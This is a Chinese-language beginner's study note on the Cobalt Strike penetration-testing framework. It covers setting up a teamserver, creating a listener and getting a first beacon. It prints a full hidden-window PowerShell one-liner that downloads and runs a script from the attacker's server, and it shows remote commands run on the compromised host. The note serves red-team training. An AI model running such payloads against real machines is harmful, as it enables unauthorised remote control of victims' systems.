Cobalt Strike(学习笔记)

Cobalt Strike简介

Cobalt Strike 是一款GUI的框架式渗透工具，集成了端口转发、服务扫描，自动化溢出，多模式端口监听，win exe木马生成，win dll木马生成，java木马生成，office宏病毒生成，木马捆绑；钓鱼攻击包括：站点克隆，目标信息获取，java执行，浏览器自动攻击等。

Cobalt Strike: C/S架构的商业渗透软件，适合多人进行团队协作，可模拟APT做模拟对抗，进行内网渗透。

注：鉴于作为新人面试会用到这些基础知识，所以把简介也抄过来了。

安装Cobalt Strike

1.安装java环境

kali系统默认安装java环境。

2.部署TeamServer

在安装cobalt strike时，必须搭建团队服务器（teamserver服务器）。kali系统打开cobaltstrike文件夹，如下图：

输入“ls -l”命令，查看teamserver和cobaltstrike是否具有x的执行权限。

如果teamserver和cobaltstrike不具备x执行权限，可以通过如下命令进行添加。

 chmod +x teamserver cobaltstrike

cobaltstrike 文件夹中有多个文件和文件夹。其功能如下：

agscript:拓展应用脚本。

c2lint:用于检查profile的错误和异常。

teamserver:团队服务程序。

cobaltstrike和cobaltstrikes.jar:客户端程序。

因为teamserver文件是通过java来调用cobalstrike的，所以直接在命令运行行环境中输入第一个文件的内容也能启动cobaltstrike客户端。

logs:日志，包括web日志、beacon日志、截图日志、下载日志、键盘记录日志等。

datas:用于保存当前teamserver的一些数据。

update和update.jar:用于更新cobalstrike。

最后，运行团队服务器。设置当前主机的IP地址和团队服务器的密码。输入如下命令启动teamserver。

./teamserver 192.168.144.130 password     //kali IP地址 ，密码

启动Cobalt Strike

1.启动cobaltstrike.jar

在linux下，可以直接通过./cobaltstrike启动客户端，如下图：


填写团队服务器的IP地址、端口号、用户名、密码。在这里，登录的用户名可以任意输人，但要保证当前该用户名没有被用来登录Cobalt Strike服务器。

在确认信息填写无误后，点击Connect连接服务端，这时候会出现指纹校验对话框，如下图。指纹校验的主要作用是防篡改，且每次创建Cobalt Strike团队服务器时生成的指纹都不一样。

在客户端向服务器成功获取相关信息后，即可打开Cobalt Strike 主页面，Cobalt Strike 主页面主要分为菜单栏、快捷功能区、目标列表区、控制台命令输出区、控制台命令输入区。

菜单栏：集成了Cobalt Strike的所有功能。

快捷功能区：列出常用的功能。

目标列表：根据不同的显示模式，显示已获取权限的主机及目标主机。

控制台命令输出区：输出命令的执行结果。

控制台命令输人区：输入命令。

2.利用cobalstrike获取第一个beacon

建立listener

可以通过菜单栏“cobaltstrike”进入“listeners”面板

也可以通过快捷功能区进入“listeners”面板

单击‘’Add‘’按钮，新建一个监听器，输入名称、监听器类型、团队服务器ip地址、监听的端口，然后单击‘’Save‘’按钮保存设置

使用web delivery 执行payload

单击 “Attacks” 菜单，选择”Web Drive-by”→”Scripted Web Delivery”选项。

或者通过快捷功能区，打开“Scripted Web Delivery”窗口

保持默认配置,选择已经创建的监听器，设置类型为PowerShell,然后单击“Launch”按钮

将Cobalt Strike生成的Payload完整地复制下来

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.144.130:80/a'))"

其中url它是个文件路径，就是让目标 （受害者）通过这个地址和端口下载恶意脚本。

访问这个url，可以看到是一段powershell代码，如下图。

在目标机器上执行Payload

执行Payload，Cobalt Strike 会收到一个Beacon

执行以后，可以在Cobalt Strike的日志里面看到一条日志

在Cobalt Strike 的主页面中可以看到有机器上线（包含外网IP地址，内网IP地址、监听器、用户名、机器名、是否有特权、Beacon进程的PID、心跳时间等信息）

与目标主机进行交互操作

单击右键，在弹出的快捷菜单中选中需要操作的Beacon，然后单击”Interact”选项，进入主机交互模式

现在就可以输入一些命令来执行相关操作了。输入”shell whoami”命令,查看当前用户，在心跳时间后就会执行该命令。在执行命令时，需要在命令前添加”shell”。Beacon的每次回连时间默认为60秒。回连后，执行命令的任务将被下发，并成功回显命令的执行结果

不是原创，新人笔记。
感谢公众号【乌云安全】，感谢斗哥。